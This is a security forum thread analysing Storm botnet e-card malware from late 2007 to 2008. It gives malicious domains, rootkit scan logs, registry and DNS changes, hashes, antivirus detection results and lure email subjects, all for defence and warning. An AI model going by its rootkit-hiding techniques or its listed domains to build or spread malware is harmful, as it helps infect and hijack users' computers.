B.I.S.S. Forums > Rise of the Greeting Cards

Kimberly

Dec 31 2007, 12:34 AM

Here we go folks, storm botnet is hitting the news again. First reports arrived on XMas eve.

http://isc.sans.org/diary.html?storyid=3778
http://isc.sans.org/diary.html?storyid=3784

Since then new variants and new domains have been reported daily. Average detection isn't too bad considering that their hashes and sizes may change every 30 minutes.

<h4>

merrychristmasdude.com - stripshow.exe

</h4>
Hijackthis log.

O4 - HKCU\..\Run: [disnisa] C:\WINDOWS\disnisa.exe

Registry changes.

Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time.

QUOTE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\disnisa.exe"
Type: REG_SZ
Data: C:\WINDOWS\disnisa.exe:*:Enabled:enable
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters "NtpServer"
Old type: REG_SZ
New type: REG_SZ
Old data: time.windows.com,0x1
New data: time.windows.com,time.nist.gov
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters "Type"
Old type: REG_SZ
New type: REG_SZ
Old data: NoSync
New data: NTP

<h4>

uhavepostcard.com - happy2008.exe

</h4>
Same changes as above, but this tier I did end up with a copy of the trojan in each folder on the HDD.

QUOTE
c:\_install.exe
c:\Program Files\_install.exe
c:\Program Files\AutoIt3\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes
c:\Program Files\AutoIt3\Aut2Exe\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes
c:\Program Files\AutoIt3\Extras\Exe2Aut\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes
c:\Program Files\AutoIt3\Extras\SQLite\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes

etc ....

the bugger also changed my DNS servers.

QUOTE
O17 - HKLM\System\CCS\Services\Tcpip\..\{0EA144BD-B0FA-4739-9823-B30B93C67B52}: NameServer = 86.64.145.140
O17 - HKLM\System\CCS\Services\Tcpip\..\{65ADB1E0-9F61-4345-A07F-FB5A49913656}: NameServer = 86.64.145.140
O17 - HKLM\System\CCS\Services\Tcpip\..\{7F1821CA-77FA-4148-A4C4-BC3F2763587A}: NameServer = 86.64.145.140
O17 - HKLM\System\CS1\Services\Tcpip\..\{0EA144BD-B0FA-4739-9823-B30B93C67B52}: NameServer = 86.64.145.140

Those two versions don't have any rootkit components but if you leave them running for a while they are able to download additional malware on the computer.
You may get an antivirus killer and beep.sys might be replaced on the computer. This version is particulary difficult to clean as beep.sys prevents the running of certain cleaning tools.

<h4>

happycards2008.com - happy-2008.exe

</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\clean767c-5b3b.sys ZwEnumerateKey [0xF5B84920]
SSDT \??\C:\WINDOWS\system32\clean767c-5b3b.sys ZwEnumerateValueKey [0xF5B84A9E]
SSDT \??\C:\WINDOWS\system32\clean767c-5b3b.sys ZwQueryDirectoryFile [0xF5B845D6]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip
clean767c-5b3b.sys
AttachedDevice \Driver\Tcpip \Device\Tcp clean767c-5b3b.sys
AttachedDevice \Driver\Tcpip \Device\Udp clean767c-5b3b.sys
AttachedDevice \Driver\Tcpip \Device\RawIp clean767c-5b3b.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\clean767c-5b3b.sys (*** hidden *** ) [AUTO] clean767c-5b3b

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanmgr.exe
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@1 0x1E 0x09 0x9B 0xF1 ...
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanri.exe
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanri.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanri.exe@1 0xDA 0x95 0xCD 0xBB ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@ImagePath \??\C:\WINDOWS\system32\clean767c-5b3b.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@DisplayName clean767c-5b3b
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b\Security@Security 0x01 0x00 0x14 0x80 ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanmgr.exe
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@1 0x1E 0x09 0x9B 0xF1 ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanri.exe
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanri.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanri.exe@1 0xDA 0x95 0xCD 0xBB ...
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VcCleanUp.exe
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VcCleanUp.exe@ C:\PROGRA~1\COMMON~1\SYMANT~1\LiveReg\VCCLEA~1.EXE
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath@ %SystemRoot%\system32\cleanmgr.exe /D %c
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@ {A9B48EAC-3ED8-11d2-8216-00C04FB687DA}
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@PropertyBag {24400D16-5754-11d2-8218-00C04FB687DA}
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@FileList *.*
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@Folder ?:\Catalog.wci
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@Flags 321
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@Priority 300
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Branding@QuietUninstallString Rundll32 IedkCS32.dll,BrandCleanInstallStubs
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cleanup.dll
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cleanup.dll@CheckAppHelp 1
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup@ ComCacheCleanup 1.0 Object
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CLSID
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CLSID@ {F7A4F1DA-96C3-4BCF-BEB3-1D9FFDE89EE9}
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CurVer
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CurVer@ NODEMGR.ComCacheCleanup.1
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1@ ComCacheCleanup 1.0 Object
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1\CLSID
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1\CLSID@ {F7A4F1DA-96C3-4BCF-BEB3-1D9FFDE89EE9}
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer@CleanShutdown 0
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz@Last used time 0x30 0xE4 0x7B 0xC4 ...
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz@Days between clean up 60
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz@NoRun 1
Reg HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache@@shell32.dll,-22026 Disk Cleanup

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\dllcache\cleanmgr.exe 64000 bytes
File C:\WINDOWS\system32\clean.config 24345 bytes
File C:\WINDOWS\system32\clean767c-5b3b.sys 129664 bytes
File C:\WINDOWS\system32\cleanmgr.exe 64000 bytes

---- EOF - GMER 1.0.14 ----

This version hides files and registry entries starting with "clean". The service and the sys file are partially random.
clean[random 4 letters / numbers]-[random 4 letters / numbers].

<h4>

newyearcards2008.com - happy-2008.exe

</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\bldy6d83-68c9.sys ZwEnumerateKey [0xF5B84920]
SSDT \??\C:\WINDOWS\system32\bldy6d83-68c9.sys ZwEnumerateValueKey [0xF5B84A9C]
SSDT \??\C:\WINDOWS\system32\bldy6d83-68c9.sys ZwQueryDirectoryFile [0xF5B845D8]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip bldy6d83-68c9.sys
AttachedDevice \Driver\Tcpip \Device\Tcp bldy6d83-68c9.sys
AttachedDevice \Driver\Tcpip \Device\Udp bldy6d83-68c9.sys
AttachedDevice \Driver\Tcpip \Device\RawIp bldy6d83-68c9.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\bldy6d83-68c9.sys (*** hidden *** ) [AUTO] bldy6d83-68c9 <-- ROOTKIT !!!

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@ImagePath \??\C:\WINDOWS\system32\bldy6d83-68c9.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@DisplayName bldy6d83-68c9
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\bldy.config 37379 bytes
File C:\WINDOWS\system32\bldy6d83-68c9.sys 129664 bytes <-- ROOTKIT !!!

---- EOF - GMER 1.0.14 ----

bldy[random 4 letters / numbers]-[random 4 letters / numbers]

<h4>

newyearwithlove.com - happynewyear2008.exe

</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys ZwEnumerateKey [0xF5BA7890]
SSDT \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys ZwEnumerateValueKey [0xF5BA7A1C]
SSDT \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys ZwQueryDirectoryFile [0xF5BA7578]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip ortyeras4790-21bc.sys
AttachedDevice \Driver\Tcpip \Device\Tcp ortyeras4790-21bc.sys
AttachedDevice \Driver\Tcpip \Device\Udp ortyeras4790-21bc.sys
AttachedDevice \Driver\Tcpip \Device\RawIp ortyeras4790-21bc.sys

Device \Driver\SYMTDI \Device\SymTDI ortyeras4790-21bc.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\ortyeras4790-21bc.sys (*** hidden *** ) [AUTO] ortyeras4790-21bc

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@ImagePath \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@DisplayName ortyeras4790-21bc
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\ortyeras.config 40563 bytes
File C:\WINDOWS\system32\ortyeras4790-21bc.sys 129536 bytes

---- EOF - GMER 1.0.14 ----

ortyeras[random 4 letters / numbers]-[random 4 letters / numbers]

<h4>

familypostcards2008.com - happynewyear2008.exe / freshcards2008.com - happynewyear2008.exe

</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwEnumerateKey [0xF5B8586E]
SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwEnumerateValueKey [0xF5B859F4]
SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwQueryDirectoryFile [0xF5B85560]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Tcp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Udp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\RawIp kalleny30c8-4459.sys

Device \Driver\SYMTDI \Device\SymTDI kalleny30c8-4459.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\kalleny30c8-4459.sys (*** hidden *** ) [AUTO] kalleny30c8-4459

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@ImagePath \??\C:\WINDOWS\system32\kalleny30c8-4459.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@DisplayName kalleny30c8-4459
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\kalleny.config 41250 bytes
File C:\WINDOWS\system32\kalleny30c8-4459.sys 131200 bytes

---- EOF - GMER 1.0.14 ----

kalleny[random 4 letters / numbers]-[random 4 letters / numbers]

<h4>

Notes

</h4>
I left a couple of entries out of the gmer scan which are related to the firewall. If you have an eagle eye, you'll be able to spot the evolution for yourself.
In the 3 last versions, one can see that the rootkit "intercepts" the firewall filtering.

Clean PC.

QUOTE
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)

Rootkit installed.

QUOTE
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp kalleny30c8-4459.sys

Device \Driver\SYMTDI \Device\SymTDI kalleny30c8-4459.sys

SymTDI is the Norton Internet Security filter, the driver has been replaced by the rootkit.

Summary.

Arrives normally as an email attachment (May arrive from drive-by downloads too).
Searches for email addresses by enumerating files with the certain extensions. This is a typical behavior of mass-mailers and spam-bots.
QUOTE
ADB - ASP - CFG - CGI - DBX - DHTM - EML - HTM - HTML - INI - JSP - MBX - MDX - MHT - MMF - MSG - NCH - NFO - ODS - OFT - PHP - PL - PP - SHT - SHTM - STM - TBB - TXT - UIN - WAB - WSH - XLS - XML
Able to send out email message(s) with the built-in SMTP client engine.
Has a build-in peer-to-peer client. The list of peers is encoded into %System%\[driver name].config
Sample:
CODE
[config]
[local]
uport=6902
[peers]
00003D6C8F338A3FDD3DF3648666F55C=185E494E272400
0100A634122F3553A046EC451061927C=29F8415B46AC00
02007E238D780D25FD5511285E2E596E=29F905AC789000
03001E62DC533E7AF6161729A953891B=29F932FE26E400
0400EB5EC13599373A3D544A2D6AF94F=29FA2158703000
etc ...
Kernel Mode driver. %System%\[driver name][random 4 letters / numbers]-[random 4 letters / numbers].sys
Code is injected into the legitimate services.exe process in order to bypass firewalls.

Note:
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Network activity.

disnisa.exe variant.

Request for internet access by the executable itself.

Rootkit variant.

Request for internet access by services.exe.

Once allowed or bypassed ... hell breaks loose. Welcome to the Storm botnet.

The bugger exhausted my DSL connection immediately, the disnisa variant simply blew out my internet connection due to the high amount of incoming and outgoing requests.

Now, consider yes or no if you really need that outbound UDP traffic above 1024. I personally deny all and make exceptions for legitimate cases based on a per application basis. If you can achieve & manage such a lockdown, you won't be communicating with the rest of your New (Year) friends even if infected.

Happy holidays to all and watch out when you open your greeting cards. Please don't end up stripped down to the bone.

Kimberly

Dec 31 2007, 06:37 PM

New domains are showing up each hour. I'll try to keep track of them.

hellosanta2008.com
happy2008toyou.com
hohoho2008.com
happysantacards.com
parentscards.com
postcards-2008.com
santapcards.com
santawishes2008.com

See also Spamtrackers
The whole wiki article also traces back activity related to Storm and represents an interesting read.

Kimberly

Jan 28 2008, 11:55 PM

<h4>

Valentine's Day

</h4>
They actually started off this campaign on the 14th January, one month before Valentine's Day.
First you get an email inviting you to read your card.

The invite simply contains an IP link now, no domains. The list of known IP's is very long and it's kinda useless to block them as they change all the time. Other sujects / phrases are:

Our Love Nest
Dream of You
Hugging My Pillow
A Toasty My Love
Our Love Will Last
When I'm With You
Path We Share
Why I Love You
I Love You Soo Much
The Dance of Love
...

Webpage looks like this:

Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Rootkit scan 2008-01-29 00:41:23
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\burito7107-6114.sys ZwEnumerateKey [0xF5A52800]
SSDT \??\C:\WINDOWS\system32\burito7107-6114.sys ZwEnumerateValueKey [0xF5A52984]
SSDT \??\C:\WINDOWS\system32\burito7107-6114.sys ZwQueryDirectoryFile [0xF5A524F4]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip burito7107-6114.sys
AttachedDevice \Driver\Tcpip \Device\Tcp burito7107-6114.sys
AttachedDevice \Driver\Tcpip \Device\Udp burito7107-6114.sys
AttachedDevice \Driver\Tcpip \Device\RawIp burito7107-6114.sys

Device \Driver\SYMTDI \Device\SymTDI burito7107-6114.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\burito7107-6114.sys (*** hidden *** ) [AUTO] burito7107-6114

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@ImagePath \??\C:\WINDOWS\system32\burito7107-6114.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@DisplayName burito7107-6114
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\burito.ini 39142 bytes
File C:\WINDOWS\system32\burito7107-6114.sys 129792 bytes

---- EOF - GMER 1.0.14 ----

burito[random 4 letters / numbers]-[random 4 letters / numbers]

Kimberly

Feb 12 2008, 06:37 AM

Only 2 days to go before Valentine's Day. They have updated webpages and graphics. Don't visit them, there is NO download link anymore to click on. If Internet Explorer is not configured correctly you will not get the prompt and your download will start automatically.

A random image is displayed this time.

The server has eight of them.

The service and the sys file are partially random: diperto[random 4 letters / numbers]-[random 4 letters / numbers]

Kimberly

Mar 3 2008, 03:31 PM

They are back to their usual ecards spam, using different subjects and messages.

Subject:

You have you received an ecard.
Check out this greeting.
You have yet to open your ecard.
Your ecard joke is waiting!
I've never laughed so hard!

Body:

Come get your personal funny postcard. You'll bust a gut!
Please click here to view your Crazy Funny Ecard Online
Come get the original Funny Card

More

Don't visit them, if Internet Explorer is not configured correctly you will not get the prompt and your download will start automatically.

The service and the sys file are partially random: diperto[random 4 letters / numbers]-[random 4 letters / numbers]

The files are rather well detected by the AV vendors.

QUOTE
File ecard.exe received on 03.03.2008 15:48:48 (CET)
Result: 22/32 (68.75%)

File diperto4e65-3398.sys received on 02.26.2008 21:39:33 (CET)
Result: 27/32 (84.38%)

Kimberly

Mar 31 2008, 06:20 PM

Don't get fooled !!!

Subject:

Join the Laugh-A-Lot!.
Happy April Fools Day!

Body:

Happy April Fools!
Wise Men Have Learned More from Fools.

<h4>

Detection

</h4>
Detection is very bad right now.

File size: 139777 bytes
MD5: 79fd954809840991bf8ce487c52c5b9b
SHA1: a27033d3dbfe4b3f6a54e2e4e03830ea75513853
PEiD: -

QUOTE
File foolsday.exe received on 03.31.2008 20:00:07 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.4.1.0 2008.03.31 -
AntiVir 7.6.0.78 2008.03.31 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.03.30 -
Avast 4.7.1098.0 2008.03.30 -
AVG 7.5.0.516 2008.03.31 -
BitDefender 7.2 2008.03.31 Trojan.Crypt.AP
CAT-QuickHeal 9.50 2008.03.31 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.03.31 -
DrWeb 4.44.0.09170 2008.03.31 -
eTrust-Vet 31.3.5658 2008.03.31 -
Ewido 4.0 2008.03.31 -
F-Prot 4.4.2.54 2008.03.30 -
F-Secure 6.70.13260.0 2008.03.31 -
FileAdvisor 1 2008.03.31 -
Fortinet 3.14.0.0 2008.03.31 -
Ikarus T3.1.1.20 2008.03.31 -
Kaspersky 7.0.0.125 2008.03.31 -
McAfee 5262 2008.03.28 -
Microsoft 1.3301 2008.03.31 -
NOD32v2 2987 2008.03.31 -
Norman 5.80.02 2008.03.31 -
Panda 9.0.0.4 2008.03.31 -
Prevx1 V2 2008.03.31 -
Rising 20.38.01.00 2008.03.31 -
Sophos 4.28.0 2008.03.31 -
Sunbelt 3.0.978.0 2008.03.18 -
Symantec 10 2008.03.31 -
TheHacker 6.2.92.259 2008.03.30 -
VBA32 3.12.6.3 2008.03.25 -
VirusBuster 4.3.26:9 2008.03.31 -
Webwasher-Gateway 6.6.2 2008.03.31 Trojan.Crypt.XPACK.Gen

<h4>

Notes

</h4>
Copies itself as %windir%\aromis.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [aromis] C:\WINDOWS\aromis.exe

Rootkit scan.

QUOTE
---- Processes - GMER 1.0.14 ----

Library C:\WINDOWS\testdll_f.dll (*** hidden *** ) @ C:\WINDOWS\aromis.exe [944] 0x00320000

---- EOF - GMER 1.0.14 ----

Kaspersky: Trojan.Win32.Agent.jem

Kimberly

Apr 9 2008, 07:09 PM

Tsss StormCodec ... and what's next.

Anyways, don't fall for it.

Still has the hidden testdll_f.dll hooked into the executable. Don't look after this file on your HDD, it doesn't exist.

Kaspersky: Email-Worm.Win32.Zhelatin.wt

Kimberly

Apr 10 2008, 01:36 AM

<h4>

stormcodec8.exe - win.exe - load.exe - stormcodec.exe

</h4>
File size: 132608 bytes
MD5...: f39c211e46a549646e1920755002459c
SHA1..: f9ab47c5300a34898a699ac67ad6c214649c0a0a
PEiD..: -

QUOTE
File win.exe received on 04.10.2008 01:52:00 (CET)
AhnLab-V3 2008.4.9.0 2008.04.09 -
AntiVir 7.6.0.81 2008.04.09 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.04.09 -
Avast 4.8.1169.0 2008.04.09 -
AVG 7.5.0.516 2008.04.09 -
BitDefender 7.2 2008.04.09 -
CAT-QuickHeal 9.50 2008.04.08 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.04.09 Trojan.Peed-188
DrWeb 4.44.0.09170 2008.04.09 -
eSafe 7.0.15.0 2008.04.09 Suspicious File
eTrust-Vet 31.3.5686 2008.04.10 Win32/Sintun!generic.2
Ewido 4.0 2008.04.09 -
F-Prot 4.4.2.54 2008.04.08 -
F-Secure 6.70.13260.0 2008.04.10 -
FileAdvisor 1 2008.04.10 -
Fortinet 3.14.0.0 2008.04.09 -
Ikarus T3.1.1.26 2008.04.10 Email-Worm.Win32.Zhelatin.ww
Kaspersky 7.0.0.125 2008.04.10 -
McAfee 5270 2008.04.09 -
Microsoft 1.3408 2008.04.10 -
NOD32v2 3014 2008.04.09 -
Norman 5.80.02 2008.04.09 -
Panda 9.0.0.4 2008.04.09 -
Prevx1 V2 2008.04.10 -
Rising 20.39.12.00 2008.04.08 -
Sophos 4.28.0 2008.04.10 Troj/Dorf-BA
Sunbelt 3.0.1032.0 2008.04.08 -
Symantec 10 2008.04.10 Trojan.Peacomm
TheHacker 6.2.92.271 2008.04.10 -
VBA32 3.12.6.4 2008.04.06 -
VirusBuster 4.3.26:9 2008.04.09 Worm.Zhelatin.Gen!Pac.6
Webwasher-Gateway 6.6.2 2008.04.09 Trojan.Crypt.XPACK.Gen

<h4>

Notes

</h4>
Copies itself as %windir%\kavir.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [kavir] C:\WINDOWS\kavir.exe

No hidden library in this version. The config file is not named after the excutable this time; but nivavir.config

